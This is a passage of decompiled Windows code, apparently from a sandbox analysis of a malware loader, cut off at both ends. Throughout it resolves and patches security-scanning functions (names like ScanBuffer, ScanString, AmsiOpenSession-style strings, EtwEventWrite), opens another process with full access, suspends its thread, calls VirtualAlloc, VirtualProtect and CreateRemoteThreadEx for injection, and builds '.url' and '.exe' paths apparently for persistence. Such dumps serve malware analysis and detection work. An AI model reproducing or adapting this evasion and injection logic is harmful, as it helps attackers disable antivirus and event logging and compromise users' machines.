										_push( *0x2744bb0);
										_push("OpenSession");
										E02724C24();
										E02724A98( &_v2216, E02724D64(_v2220));
										_push(_v2216);
										_t3471 =  *0x2744bb0; // 0x2b81b38
										E02724BB0( &_v2228, _t3471, 0x273e77c);
										E02724A98( &_v2224, E02724D64(_v2228));
										_pop(_t4060); // executed
										E02733690(_v2224, _t3378, _t4060, 0x2744b88);
										_t2605 =  *0x2744b34; // 0x2b89040
										E02724A98( &_v2232, E02724D64(_t2605));
										E027357D0(_v2232, _t3378, 0x2744b90, _t4332, 0x2744b88, __eflags); // executed
										_push(0x273e77c);
										_push( *0x2744bb0);
										_push("ScanBuffer");
										E02724C24();
										E02724A98( &_v2236, E02724D64(_v2240));
										_push(_v2236);
										_t3472 =  *0x2744bb0; // 0x2b81b38
										E02724BB0( &_v2248, _t3472, 0x273e77c);
										E02724A98( &_v2244, E02724D64(_v2248));
										_pop(_t4067); // executed
										E02733690(_v2244, _t3378, _t4067, 0x2744b88); // executed
										_push(0x273e77c);
										_push( *0x2744bb0);
										_push("OpenSession");
										E02724C24();
										E02724A98( &_v2252, E02724D64(_v2256));
										_push(_v2252);
										_t3473 =  *0x2744bb0; // 0x2b81b38
										E02724BB0( &_v2264, _t3473, 0x273e77c);
										E02724A98( &_v2260, E02724D64(_v2264));
										_pop(_t4072); // executed
										E02733690(_v2260, _t3378, _t4072, 0x2744b88);
										_t2639 =  *0x2744b90; // 0x1764
										 *0x2744b94 = OpenProcess(0x1f0fff, 0, _t2639);
										_push(0x273e77c);
										_push( *0x2744bb0);
										_push("ScanBuffer");
										E02724C24();
										E02724A98( &_v2268, E02724D64(_v2272));
										_push(_v2268);
										_t3474 =  *0x2744bb0; // 0x2b81b38
										E02724BB0( &_v2280, _t3474, 0x273e77c);
										E02724A98( &_v2276, E02724D64(_v2280));
										_pop(_t4077); // executed
										E02733690(_v2276, _t3378, _t4077, 0x2744b88); // executed
										_push(0x273e77c);
										_push( *0x2744bb0);
										_push("OpenSession");
										E02724C24();
										E02724A98( &_v2284, E02724D64(_v2288));
										_push(_v2284);
										_t3475 =  *0x2744bb0; // 0x2b81b38
										E02724BB0( &_v2296, _t3475, 0x273e77c);
										E02724A98( &_v2292, E02724D64(_v2296));
										_pop(_t4082); // executed
										E02733690(_v2292, _t3378, _t4082, 0x2744b88);
										_t2669 =  *0x2744b94; // 0x854
										NtSuspendThread(_t2669); // executed
										_push(0x273e77c);
										_push( *0x2744bb0);
										_push("ScanBuffer");
										E02724C24();
										E02724A98( &_v2300, E02724D64(_v2304));
										_push(_v2300);
										_t3476 =  *0x2744bb0; // 0x2b81b38
										E02724BB0( &_v2312, _t3476, 0x273e77c);
										E02724A98( &_v2308, E02724D64(_v2312));
										_pop(_t4087); // executed
										E02733690(_v2308, _t3378, _t4087, 0x2744b88); // executed
										_push(0x273e77c);
										_push( *0x2744bb0);
										_push("OpenSession");
										E02724C24();
										E02724A98( &_v2316, E02724D64(_v2320));
										_push(_v2316);
										_t3477 =  *0x2744bb0; // 0x2b81b38
										E02724BB0( &_v2328, _t3477, 0x273e77c);
										E02724A98( &_v2324, E02724D64(_v2328));
										_pop(_t4092); // executed
										E02733690(_v2324, _t3378, _t4092, 0x2744b88); // executed
										_push(0x273e77c);
										_push( *0x2744bb0);
										_push("ScanBuffer");
										E02724C24();
										E02724A98( &_v2332, E02724D64(_v2336));
										_push(_v2332);
										_t3478 =  *0x2744bb0; // 0x2b81b38
										E02724BB0( &_v2344, _t3478, 0x273e77c);
										E02724A98( &_v2340, E02724D64(_v2344));
										_pop(_t4097); // executed
										E02733690(_v2340, _t3378, _t4097, 0x2744b88); // executed
										_t2714 = E0272304C(0x38c);
										_push(_t2714);
										L027358FC();
										__eflags = _t2714;
										if(_t2714 == 0) {
											_push(0x273e77c);
											_push( *0x2744bb0);
											_push("ScanBuffer");
											E02724C24();
											E02724A98( &_v2348, E02724D64(_v2352));
											_push(_v2348);
											_t3479 =  *0x2744bb0; // 0x2b81b38
											E02724BB0( &_v2360, _t3479, 0x273e77c);
											E02724A98( &_v2356, E02724D64(_v2360));
											_pop(_t4102); // executed
											E02733690(_v2356, _t3378, _t4102, 0x2744b88); // executed
										} else {
											E027248F4(0x2744bb8, "5E5CDDEE");
										}
										_push(0x273e77c);
										_push( *0x2744bb0);
										_push("OpenSession");
										E02724C24();
										E02724A98( &_v2364, E02724D64(_v2368));
										_push(_v2364);
										_t3480 =  *0x2744bb0; // 0x2b81b38
										E02724BB0( &_v2376, _t3480, 0x273e77c);
										E02724A98( &_v2372, E02724D64(_v2376));
										_pop(_t4107); // executed
										E02733690(_v2372, _t3378, _t4107, 0x2744b88); // executed
										E02724DBC(0x2744b78);
										_t2745 =  *0x2744b94; // 0x854, executed
										E0273779C(_t2745, _t3378, _t4332, 0x2744b88, _t4354); // executed
										_push(0x273e77c);
										_push( *0x2744bb0);
										_push("ScanBuffer");
										E02724C24();
										E02724A98( &_v2380, E02724D64(_v2384));
										_push(_v2380);
										_t3482 =  *0x2744bb0; // 0x2b81b38
										E02724BB0( &_v2392, _t3482, 0x273e77c);
										E02724A98( &_v2388, E02724D64(_v2392));
										_pop(_t4113); // executed
										E02733690(_v2388, _t3378, _t4113, 0x2744b88);
										_t2761 =  *0x2744b94; // 0x854
										_push(_t2761);
										L02738604();
										_push(0x273e77c);
										_push( *0x2744bb0);
										_push("ScanBuffer");
										E02724C24();
										E02724A98( &_v2396, E02724D64(_v2400));
										_push(_v2396);
										_t3483 =  *0x2744bb0; // 0x2b81b38
										E02724BB0( &_v2408, _t3483, 0x273e77c);
										E02724A98( &_v2404, E02724D64(_v2408));
										_pop(_t4118); // executed
										E02733690(_v2404, _t3378, _t4118, 0x2744b88); // executed
									}
								}
							}
							_push(0x273e77c);
							_push( *0x2744bb0);
							_push("OpenSession");
							E02724C24();
							E02724A98( &_v2412, E02724D64(_v2416));
							_push(_v2412);
							_t3450 =  *0x2744bb0; // 0x2b81b38
							E02724BB0( &_v2424, _t3450, 0x273e77c);
							E02724A98( &_v2420, E02724D64(_v2424));
							_pop(_t3864); // executed
							E02733690(_v2420, _t3378, _t3864, 0x2744b88); // executed
							_push(0x273e77c);
							_push( *0x2744bb0);
							_push("ScanString");
							E02724C24();
							E02724A98( &_v2428, E02724D64(_v2432));
							_push(_v2428);
							_t3451 =  *0x2744bb0; // 0x2b81b38
							E02724BB0( &_v2440, _t3451, 0x273e77c);
							E02724A98( &_v2436, E02724D64(_v2440));
							_pop(_t3869); // executed
							E02733690(_v2436, _t3378, _t3869, 0x2744b88);
							_t2067 =  *0x2744bc0; // 0x0
							E02724CB0(_t2067, 0x273e8cc);
							if(__eflags == 0) {
								_t2511 =  *0x2744bc4; // 0x2b81b48
								E02724CB0(_t2511, 0x273e8cc);
								if(__eflags != 0) {
									_t2513 =  *0x2744bc8; // 0x0
									E02724CB0(_t2513, 0x273e8cc);
									if(__eflags != 0) {
										_t2516 = E0272304C(0x38c);
										_push(_t2516);
										L027358FC();
										__eflags = _t2516;
										if(_t2516 == 0) {
											_push(0x273e77c);
											_push( *0x2744bb0);
											_push("ScanBuffer");
											E02724C24();
											E02724A98( &_v2444, E02724D64(_v2448));
											_push(_v2444);
											_t3466 =  *0x2744bb0; // 0x2b81b38
											E02724BB0( &_v2456, _t3466, 0x273e77c);
											E02724A98( &_v2452, E02724D64(_v2456));
											_pop(_t4034);
											E02733690(_v2452, _t3378, _t4034, 0x2744b88);
										} else {
											E027248F4(0x2744bb8, "5E5CDDEE");
										}
										__eflags = 0;
										E02722FC4(0,  &_v2460);
										_push(_v2460);
										_t2535 = E02724DBC(0x2744b78);
										_pop(_t2536);
										E02733990(_t2536, _t3378, _t2535, 0x2744b88, _t4354);
									}
								}
							}
							_push(0x273e77c);
							_push( *0x2744bb0);
							_push("ScanString");
							E02724C24();
							E02724A98( &_v2464, E02724D64(_v2468));
							_push(_v2464);
							_t3452 =  *0x2744bb0; // 0x2b81b38
							E02724BB0( &_v2476, _t3452, 0x273e77c);
							E02724A98( &_v2472, E02724D64(_v2476));
							_pop(_t3875); // executed
							E02733690(_v2472, _t3378, _t3875, 0x2744b88); // executed
							_push(0x273e77c);
							_push( *0x2744bb0);
							_push("OpenSession");
							E02724C24();
							E02724A98( &_v2480, E02724D64(_v2484));
							_push(_v2480);
							_t3453 =  *0x2744bb0; // 0x2b81b38
							E02724BB0( &_v2492, _t3453, 0x273e77c);
							E02724A98( &_v2488, E02724D64(_v2492));
							_pop(_t3880); // executed
							E02733690(_v2488, _t3378, _t3880, 0x2744b88);
							_t2097 =  *0x2744bc8; // 0x0
							E02724CB0(_t2097, 0x273e8cc);
							if(__eflags == 0) {
								_t2486 =  *0x2744bc0; // 0x0
								E02724CB0(_t2486, 0x273e8cc);
								if(__eflags != 0) {
									_t2488 =  *0x2744bc4; // 0x2b81b48
									E02724CB0(_t2488, 0x273e8cc);
									if(__eflags != 0) {
										_t2491 = E0272304C(0x38c);
										_push(_t2491);
										L027358FC();
										__eflags = _t2491;
										if(_t2491 == 0) {
											_push(0x273e77c);
											_push( *0x2744bb0);
											_push("ScanBuffer");
											E02724C24();
											E02724A98( &_v2496, E02724D64(_v2500));
											_push(_v2496);
											_t3465 =  *0x2744bb0; // 0x2b81b38
											E02724BB0( &_v2508, _t3465, 0x273e77c);
											E02724A98( &_v2504, E02724D64(_v2508));
											_pop(_t4026);
											E02733690(_v2504, _t3378, _t4026, 0x2744b88);
										} else {
											E027248F4(0x2744bb8, "5E5CDDEE");
										}
										E027348A0(E02724DBC(0x2744b78), _t3378, _t4332, 0x2744b88, _t4354);
									}
								}
							}
							_push(0x273e77c);
							_push( *0x2744bb0);
							_push("OpenSession");
							E02724C24();
							E02724A98( &_v2512, E02724D64(_v2516));
							_push(_v2512);
							_t3454 =  *0x2744bb0; // 0x2b81b38
							E02724BB0( &_v2524, _t3454, 0x273e77c);
							E02724A98( &_v2520, E02724D64(_v2524));
							_pop(_t3886); // executed
							E02733690(_v2520, _t3378, _t3886, 0x2744b88); // executed
							_push(0x273e77c);
							_push( *0x2744bb0);
							_push("Initialize");
							E02724C24();
							E02724A98( &_v2528, E02724D64(_v2532));
							_push(_v2528);
							_t3455 =  *0x2744bb0; // 0x2b81b38
							E02724BB0( &_v2540, _t3455, 0x273e77c);
							E02724A98( &_v2536, E02724D64(_v2540));
							_pop(_t3891); // executed
							E02733690(_v2536, _t3378, _t3891, 0x2744b88); // executed
							_push(0x273e77c);
							_push( *0x2744bb0);
							_push("ScanString");
							E02724C24();
							E02724A98( &_v2544, E02724D64(_v2548));
							_push(_v2544);
							_t3456 =  *0x2744bb0; // 0x2b81b38
							E02724BB0( &_v2556, _t3456, 0x273e77c);
							E02724A98( &_v2552, E02724D64(_v2556));
							_pop(_t3896); // executed
							E02733690(_v2552, _t3378, _t3896, 0x2744b88); // executed
							E02724A98( &_v2560, "VirtualProtect");
							_push(_v2560);
							E02724A98( &_v2564, "kernel32");
							_pop(_t3899);
							E02733690(_v2564, _t3378, _t3899, 0x2744b88);
							E02724A98( &_v2568, "VirtualAlloc");
							_push(_v2568);
							E02724A98( &_v2572, "kernel32");
							_pop(_t3902);
							E02733690(_v2572, _t3378, _t3902, 0x2744b88);
							_push(0x273e77c);
							_push( *0x2744bb0);
							_push("OpenSession");
							E02724C24();
							E02724A98( &_v2576, E02724D64(_v2580));
							_push(_v2576);
							_t3457 =  *0x2744bb0; // 0x2b81b38
							E02724BB0( &_v2588, _t3457, 0x273e77c);
							E02724A98( &_v2584, E02724D64(_v2588));
							_pop(_t3907); // executed
							E02733690(_v2584, _t3378, _t3907, 0x2744b88); // executed
							E02724A98( &_v2592, "VirtualProtect");
							_push(_v2592);
							E02724A98( &_v2596, "KernelBase");
							_pop(_t3910);
							E02733690(_v2596, _t3378, _t3910, 0x2744b88);
							E02724A98( &_v2600, "VirtualAlloc");
							_push(_v2600);
							E02724A98( &_v2604, "KernelBase");
							_pop(_t3913);
							E02733690(_v2604, _t3378, _t3913, 0x2744b88);
							_push(0x273e77c);
							_push( *0x2744bb0);
							_push("OpenSession");
							E02724C24();
							E02724A98( &_v2608, E02724D64(_v2612));
							_push(_v2608);
							_t3458 =  *0x2744bb0; // 0x2b81b38
							E02724BB0( &_v2620, _t3458, 0x273e77c);
							E02724A98( &_v2616, E02724D64(_v2620));
							_pop(_t3918); // executed
							E02733690(_v2616, _t3378, _t3918, 0x2744b88); // executed
							_push(0x273e77c);
							_push( *0x2744bb0);
							_push("UacInitialize");
							E02724C24();
							E02724A98( &_v2624, E02724D64(_v2628));
							_push(_v2624);
							_t3459 =  *0x2744bb0; // 0x2b81b38
							E02724BB0( &_v2636, _t3459, 0x273e77c);
							E02724A98( &_v2632, E02724D64(_v2636));
							_pop(_t3923); // executed
							E02733690(_v2632, _t3378, _t3923, 0x2744b88); // executed
							_push(0x273e77c);
							_push( *0x2744bb0);
							_push("UacScan");
							E02724C24();
							E02724A98( &_v2640, E02724D64(_v2644));
							_push(_v2640);
							_t3460 =  *0x2744bb0; // 0x2b81b38
							E02724BB0( &_v2652, _t3460, 0x273e77c);
							E02724A98( &_v2648, E02724D64(_v2652));
							_pop(_t3928); // executed
							E02733690(_v2648, _t3378, _t3928, 0x2744b88); // executed
							_push(0x273e77c);
							_push( *0x2744bb0);
							_push("ScanString");
							E02724C24();
							E02724A98( &_v2656, E02724D64(_v2660));
							_push(_v2656);
							_t3461 =  *0x2744bb0; // 0x2b81b38
							E02724BB0( &_v2668, _t3461, 0x273e77c);
							E02724A98( &_v2664, E02724D64(_v2668));
							_pop(_t3933); // executed
							E02733690(_v2664, _t3378, _t3933, 0x2744b88); // executed
							_t2240 = E0272304C(0x38c);
							__eflags = _t2240 - 0xc;
							if(_t2240 != 0xc) {
								E027248F4(0x2744bb8, 0x273ea48);
							} else {
								E027248F4(0x2744bb8, "5E5CDDEE");
							}
							E02724A98( &_v2672, "CreateRemoteThreadEx ");
							_push(_v2672);
							E02724A98( &_v2676, "kernelbase");
							_pop(_t3937);
							E02733690(_v2676, _t3378, _t3937, 0x2744b88);
							_push(0x273e77c);
							_push( *0x2744bb0);
							_push("UacScan");
							E02724C24();
							E02724A98( &_v2680, E02724D64(_v2684));
							_push(_v2680);
							_t3462 =  *0x2744bb0; // 0x2b81b38
							E02724BB0( &_v2692, _t3462, 0x273e77c);
							E02724A98( &_v2688, E02724D64(_v2692));
							_pop(_t3942); // executed
							E02733690(_v2688, _t3378, _t3942, 0x2744b88); // executed
							E02724A98( &_v2696, "ReportEventA");
							_push(_v2696);
							E02724A98( &_v2700, "advapi32");
							_pop(_t3945);
							E02733690(_v2700, _t3378, _t3945, 0x2744b88);
							E02724A98( &_v2704, "SetEncryptedFileMetadata");
							_push(_v2704);
							E02724A98( &_v2708, "advapi32");
							_pop(_t3948);
							E02733690(_v2708, _t3378, _t3948, 0x2744b88);
							E02724A98( &_v2712, "ReportEventW");
							_push(_v2712);
							E02724A98( &_v2716, "advapi32");
							_pop(_t3951);
							E02733690(_v2716, _t3378, _t3951, 0x2744b88);
							_push(0x273e77c);
							_push( *0x2744bb0);
							_push("ScanString");
							E02724C24();
							E02724A98( &_v2720, E02724D64(_v2724));
							_push(_v2720);
							_t3463 =  *0x2744bb0; // 0x2b81b38
							E02724BB0( &_v2732, _t3463, 0x273e77c);
							E02724A98( &_v2728, E02724D64(_v2732));
							_pop(_t3956); // executed
							E02733690(_v2728, _t3378, _t3956, 0x2744b88); // executed
							E02724A98( &_v2736, "LdrGetDllHandle");
							_push(_v2736);
							_t2302 =  *0x2744bb8; // 0x2b89b38
							E02724A98( &_v2740, E02724D64(_t2302));
							_pop(_t3959);
							E02733690(_v2740, _t3378, _t3959, 0x2744b88);
							E02724A98( &_v2744, "NtPrivilegedServiceAuditAlarm");
							_push(_v2744);
							_t2311 =  *0x2744bb8; // 0x2b89b38
							E02724A98( &_v2748, E02724D64(_t2311));
							_pop(_t3962);
							E02733690(_v2748, _t3378, _t3962, 0x2744b88);
							E02724A98( &_v2752, "LdrQueryProcessModuleInformation");
							_push(_v2752);
							_t2320 =  *0x2744bb8; // 0x2b89b38
							E02724A98( &_v2756, E02724D64(_t2320));
							_pop(_t3965);
							E02733690(_v2756, _t3378, _t3965, 0x2744b88);
							E02724A98( &_v2760, "LdrLoadDll");
							_push(_v2760);
							_t2329 =  *0x2744bb8; // 0x2b89b38
							E02724A98( &_v2764, E02724D64(_t2329));
							_pop(_t3968);
							E02733690(_v2764, _t3378, _t3968, 0x2744b88);
							E02724A98( &_v2768, "NtOpenObjectAuditAlarm");
							_push(_v2768);
							_t2338 =  *0x2744bb8; // 0x2b89b38
							E02724A98( &_v2772, E02724D64(_t2338));
							_pop(_t3971);
							E02733690(_v2772, _t3378, _t3971, 0x2744b88);
							E02724A98( &_v2776, "NtPrivilegeObjectAuditAlarm");
							_push(_v2776);
							_t2347 =  *0x2744bb8; // 0x2b89b38
							E02724A98( &_v2780, E02724D64(_t2347));
							_pop(_t3974);
							E02733690(_v2780, _t3378, _t3974, 0x2744b88);
							E02724A98( &_v2784, "NtAccessCheckAndAuditAlarm");
							_push(_v2784);
							_t2356 =  *0x2744bb8; // 0x2b89b38
							E02724A98( &_v2788, E02724D64(_t2356));
							_pop(_t3977);
							E02733690(_v2788, _t3378, _t3977, 0x2744b88);
							E02724A98( &_v2792, "NtAccessCheck");
							_push(_v2792);
							_t2365 =  *0x2744bb8; // 0x2b89b38
							E02724A98( &_v2796, E02724D64(_t2365));
							_pop(_t3980);
							E02733690(_v2796, _t3378, _t3980, 0x2744b88);
							E02724A98( &_v2800, "NtAllocateUuids");
							_push(_v2800);
							_t2374 =  *0x2744bb8; // 0x2b89b38
							E02724A98( &_v2804, E02724D64(_t2374));
							_pop(_t3983);
							E02733690(_v2804, _t3378, _t3983, 0x2744b88);
							E02724A98( &_v2808, "NtPrivilegeCheck");
							_push(_v2808);
							_t2383 =  *0x2744bb8; // 0x2b89b38
							E02724A98( &_v2812, E02724D64(_t2383));
							_pop(_t3986);
							E02733690(_v2812, _t3378, _t3986, 0x2744b88);
							E02724A98( &_v2816, "NtSetSecurityObject");
							_push(_v2816);
							_t2392 =  *0x2744bb8; // 0x2b89b38
							E02724A98( &_v2820, E02724D64(_t2392));
							_pop(_t3989);
							E02733690(_v2820, _t3378, _t3989, 0x2744b88);
							E02724A98( &_v2824, "NtQuerySecurityObject");
							_push(_v2824);
							_t2401 =  *0x2744bb8; // 0x2b89b38
							E02724A98( &_v2828, E02724D64(_t2401));
							_pop(_t3992);
							E02733690(_v2828, _t3378, _t3992, 0x2744b88);
							_push(0x273e77c);
							_push( *0x2744bb0);
							_push("ScanString");
							E02724C24();
							E02724A98( &_v2832, E02724D64(_v2836));
							_push(_v2832);
							_t3464 =  *0x2744bb0; // 0x2b81b38
							E02724BB0( &_v2844, _t3464, 0x273e77c);
							E02724A98( &_v2840, E02724D64(_v2844));
							_pop(_t3997); // executed
							E02733690(_v2840, _t3378, _t3997, 0x2744b88); // executed
							E02724A98( &_v2848, "NtCreateSection");
							_push(_v2848);
							_t2424 =  *0x2744bb8; // 0x2b89b38
							E02724A98( &_v2852, E02724D64(_t2424));
							_pop(_t4000);
							E02733690(_v2852, _t3378, _t4000, 0x2744b88);
							E02724A98( &_v2856, "NtOpenSection");
							_push(_v2856);
							_t2433 =  *0x2744bb8; // 0x2b89b38
							E02724A98( &_v2860, E02724D64(_t2433));
							_pop(_t4003);
							E02733690(_v2860, _t3378, _t4003, 0x2744b88);
							E02724A98( &_v2864, "NtMapViewOfSection");
							_push(_v2864);
							_t2442 =  *0x2744bb8; // 0x2b89b38
							E02724A98( &_v2868, E02724D64(_t2442));
							_pop(_t4006);
							E02733690(_v2868, _t3378, _t4006, 0x2744b88);
							E02724A98( &_v2872, "NtCreateFile");
							_push(_v2872);
							_t2451 =  *0x2744bb8; // 0x2b89b38
							E02724A98( &_v2876, E02724D64(_t2451));
							_pop(_t4009);
							E02733690(_v2876, _t3378, _t4009, 0x2744b88);
							E02724A98( &_v2880, "EtwEventWriteEx");
							_push(_v2880);
							_t2460 =  *0x2744bb8; // 0x2b89b38
							E02724A98( &_v2884, E02724D64(_t2460));
							_pop(_t4012);
							E02733690(_v2884, _t3378, _t4012, 0x2744b88);
							E02724A98( &_v2888, "NtOpenFile");
							_push(_v2888);
							_t2469 =  *0x2744bb8; // 0x2b89b38
							E02724A98( &_v2892, E02724D64(_t2469));
							_pop(_t4015);
							E02733690(_v2892, _t3378, _t4015, 0x2744b88);
							E02724A98( &_v2896, "EtwEventWrite");
							_push(_v2896);
							_t2478 =  *0x2744bb8; // 0x2b89b38
							E02724A98( &_v2900, E02724D64(_t2478));
							_pop(_t4018);
							E02733690(_v2900, _t3378, _t4018, 0x2744b88);
							ExitProcess(0); // executed
							goto L60;
						} else {
							_push( *0x2744b84);
							_push(0x273e8d8);
							_push("Null");
							E02724C24();
							E02724A98( &_v1432, E02724D64(_v1436));
							_t2784 = E027280F8(_v1432);
							__eflags = _t2784;
							if(_t2784 != 0) {
								goto L35;
							} else {
								E02724A98( &_v1440, "C:\\Windows\\SysWOW64");
								_t2788 = E0272811C(_v1440);
								__eflags = _t2788;
								if(_t2788 == 0) {
									goto L35;
								} else {
									_push(0x273e77c);
									_push( *0x2744bb0);
									_push("OpenSession");
									E02724C24();
									E02724A98( &_v1444, E02724D64(_v1448));
									_push(_v1444);
									_t3484 =  *0x2744bb0; // 0x2b81b38
									E02724BB0( &_v1456, _t3484, 0x273e77c);
									E02724A98( &_v1452, E02724D64(_v1456));
									_pop(_t4127);
									E02733690(_v1452, _t3378, _t4127, 0x2744b88);
									_push(0x273e77c);
									_push( *0x2744bb0);
									_push("ScanBuffer");
									E02724C24();
									E02724A98( &_v1460, E02724D64(_v1464));
									_push(_v1460);
									_t3485 =  *0x2744bb0; // 0x2b81b38
									E02724BB0( &_v1472, _t3485, 0x273e77c);
									E02724A98( &_v1468, E02724D64(_v1472));
									_pop(_t4132);
									E02733690(_v1468, _t3378, _t4132, 0x2744b88);
									 *0x2744b8c = E02723C30(1);
									 *[fs:eax] = _t4337;
									E0272304C(0x64);
									E02727C4C( &_v1476);
									_t2824 =  *0x2744b8c; // 0x2b5e8d0
									 *((intOrPtr*)( *_t2824 + 0x38))( *[fs:eax], 0x273c0d2, _t4336);
									E02724C24();
									E02724A98( &_v1480, E02724D64(_v1484));
									_t2831 =  *0x2744b8c; // 0x2b5e8d0
									 *((intOrPtr*)( *_t2831 + 0x74))("Null", 0x273e8d8,  *0x2744b84);
									__eflags = 0;
									_pop(_t4139);
									 *[fs:eax] = _t4139;
									_push(0x273c0d9);
									_t2834 =  *0x2744b8c; // 0x2b5e8d0
									return E02723C60(_t2834);
								}
							}
						}
					} else {
						_push( *0x2744b84);
						_push(0x273e8d8);
						_t2836 =  *0x2744bd4; // 0x2b893a0
						E02738E04(_t2836, _t3378, _t3434,  &_v776, _t4332, 0x2744b88);
						_push(_v776);
						_push(".url");
						E02724C24();
						E02724A98( &_v768, E02724D64(_v772));
						if(E027280F8(_v768) != 0) {
							goto L31;
						} else {
							_push(0x273e77c);
							_push( *0x2744bb0);
							_push("Initialize");
							E02724C24();
							E02724A98( &_v780, E02724D64(_v784));
							_push(_v780);
							_t3490 =  *0x2744bb0; // 0x2b81b38
							E02724BB0( &_v792, _t3490, 0x273e77c);
							E02724A98( &_v788, E02724D64(_v792));
							_pop(_t4147); // executed
							E02733690(_v788, _t3378, _t4147, 0x2744b88); // executed
							_push(0x273e77c);
							_push( *0x2744bb0);
							_push("ScanBuffer");
							E02724C24();
							E02724A98( &_v796, E02724D64(_v800));
							_push(_v796);
							_t3491 =  *0x2744bb0; // 0x2b81b38
							E02724BB0( &_v808, _t3491, 0x273e77c);
							E02724A98( &_v804, E02724D64(_v808));
							_pop(_t4152); // executed
							E02733690(_v804, _t3378, _t4152, 0x2744b88); // executed
							_push(0x273e77c);
							_push( *0x2744bb0);
							_push("OpenSession");
							E02724C24();
							E02724A98( &_v812, E02724D64(_v816));
							_push(_v812);
							_t3492 =  *0x2744bb0; // 0x2b81b38
							E02724BB0( &_v824, _t3492, 0x273e77c);
							E02724A98( &_v820, E02724D64(_v824));
							_pop(_t4157); // executed
							E02733690(_v820, _t3378, _t4157, 0x2744b88); // executed
							_push(0x273e77c);
							_push( *0x2744bb0);
							_push("ScanString");
							E02724C24();
							E02724A98( &_v828, E02724D64(_v832));
							_push(_v828);
							_t3493 =  *0x2744bb0; // 0x2b81b38
							E02724BB0( &_v840, _t3493, 0x273e77c);
							E02724A98( &_v836, E02724D64(_v840));
							_pop(_t4162); // executed
							E02733690(_v836, _t3378, _t4162, 0x2744b88); // executed
							_push( *0x2744b84);
							_push(0x273e8d8);
							_push( *0x2744bd4);
							E02724C24();
							E02724A98(0x2744bd0, E02724D64(_v844));
							_push(0x273e77c);
							_push( *0x2744bb0);
							_push("Initialize");
							E02724C24();
							E02724A98( &_v848, E02724D64(_v852));
							_push(_v848);
							_t3494 =  *0x2744bb0; // 0x2b81b38
							E02724BB0( &_v860, _t3494, 0x273e77c);
							E02724A98( &_v856, E02724D64(_v860));
							_pop(_t4169); // executed
							E02733690(_v856, _t3378, _t4169, 0x2744b88); // executed
							_push(0x273e77c);
							_push( *0x2744bb0);
							_push("ScanBuffer");
							E02724C24();
							E02724A98( &_v864, E02724D64(_v868));
							_push(_v864);
							_t3495 =  *0x2744bb0; // 0x2b81b38
							E02724BB0( &_v876, _t3495, 0x273e77c);
							E02724A98( &_v872, E02724D64(_v876));
							_pop(_t4174); // executed
							E02733690(_v872, _t3378, _t4174, 0x2744b88); // executed
							_push(0x273e77c);
							_push( *0x2744bb0);
							_push("OpenSession");
							E02724C24();
							E02724A98( &_v880, E02724D64(_v884));
							_push(_v880);
							_t3496 =  *0x2744bb0; // 0x2b81b38
							E02724BB0( &_v892, _t3496, 0x273e77c);
							E02724A98( &_v888, E02724D64(_v892));
							_pop(_t4179); // executed
							E02733690(_v888, _t3378, _t4179, 0x2744b88); // executed
							_push(0x273e77c);
							_push( *0x2744bb0);
							_push("ScanString");
							E02724C24();
							E02724A98( &_v896, E02724D64(_v900));
							_push(_v896);
							_t3497 =  *0x2744bb0; // 0x2b81b38
							E02724BB0( &_v908, _t3497, 0x273e77c);
							E02724A98( &_v904, E02724D64(_v908));
							_pop(_t4184); // executed
							E02733690(_v904, _t3378, _t4184, 0x2744b88);
							_t2962 =  *0x2744bd0; // 0x2b3c7b8
							if((E027280F8(_t2962) ^ 0x00000001) == 1) {
								_push(0x273e77c);
								_push( *0x2744bb0);
								_push("Initialize");
								E02724C24();
								E02724A98( &_v912, E02724D64(_v916));
								_push(_v912);
								_t3520 =  *0x2744bb0; // 0x2b81b38
								E02724BB0( &_v924, _t3520, 0x273e77c);
								E02724A98( &_v920, E02724D64(_v924));
								_pop(_t4272); // executed
								E02733690(_v920, _t3378, _t4272, 0x2744b88); // executed
								_push(0x273e77c);
								_push( *0x2744bb0);
								_push("OpenSession");
								E02724C24();
								E02724A98( &_v928, E02724D64(_v932));
								_push(_v928);
								_t3521 =  *0x2744bb0; // 0x2b81b38
								E02724BB0( &_v940, _t3521, 0x273e77c);
								E02724A98( &_v936, E02724D64(_v940));
								_pop(_t4277); // executed
								E02733690(_v936, _t3378, _t4277, 0x2744b88); // executed
								_push(0x273e77c);
								_push( *0x2744bb0);
								_push("ScanBuffer");
								E02724C24();
								E02724A98( &_v944, E02724D64(_v948));
								_push(_v944);
								_t3522 =  *0x2744bb0; // 0x2b81b38
								E02724BB0( &_v956, _t3522, 0x273e77c);
								E02724A98( &_v952, E02724D64(_v956));
								_pop(_t4282); // executed
								E02733690(_v952, _t3378, _t4282, 0x2744b88);
								_t3235 =  *0x2744bd0; // 0x2b3c7b8
								E02724A98( &_v960, E02724D64(_t3235));
								_t3239 =  *0x2744b7c; // 0x2ade208, executed
								E027389A4(_t3239, _t3378, _v960, 0x2744b88); // executed
							}
							_push(0x273e77c);
							_push( *0x2744bb0);
							_push("Initialize");
							E02724C24();
							E02724A98( &_v964, E02724D64(_v968));
							_push(_v964);
							_t3498 =  *0x2744bb0; // 0x2b81b38
							E02724BB0( &_v976, _t3498, 0x273e77c);
							E02724A98( &_v972, E02724D64(_v976));
							_pop(_t4189); // executed
							E02733690(_v972, _t3378, _t4189, 0x2744b88); // executed
							_push(0x273e77c);
							_push( *0x2744bb0);
							_push("ScanBuffer");
							E02724C24();
							E02724A98( &_v980, E02724D64(_v984));
							_push(_v980);
							_t3499 =  *0x2744bb0; // 0x2b81b38
							E02724BB0( &_v992, _t3499, 0x273e77c);
							E02724A98( &_v988, E02724D64(_v992));
							_pop(_t4194); // executed
							E02733690(_v988, _t3378, _t4194, 0x2744b88); // executed
							_push(0x273e77c);
							_push( *0x2744bb0);
							_push("OpenSession");
							E02724C24();
							E02724A98( &_v996, E02724D64(_v1000));
							_push(_v996);
							_t3500 =  *0x2744bb0; // 0x2b81b38
							E02724BB0( &_v1008, _t3500, 0x273e77c);
							E02724A98( &_v1004, E02724D64(_v1008));
							_pop(_t4199); // executed
							E02733690(_v1004, _t3378, _t4199, 0x2744b88); // executed
							_push(0x273e77c);
							_push( *0x2744bb0);
							_push("ScanString");
							E02724C24();
							E02724A98( &_v1012, E02724D64(_v1016));
							_push(_v1012);
							_t3501 =  *0x2744bb0; // 0x2b81b38
							E02724BB0( &_v1024, _t3501, 0x273e77c);
							E02724A98( &_v1020, E02724D64(_v1024));
							_pop(_t4204); // executed
							E02733690(_v1020, _t3378, _t4204, 0x2744b88); // executed
							_push( *0x2744b84);
							_push(0x273e8d8);
							_push( *0x2744bd4);
							_push(".exe");
							E02724C24();
							E02724A98(0x27449c0, E02724D64(_v1028));
							_push(0x273e77c);
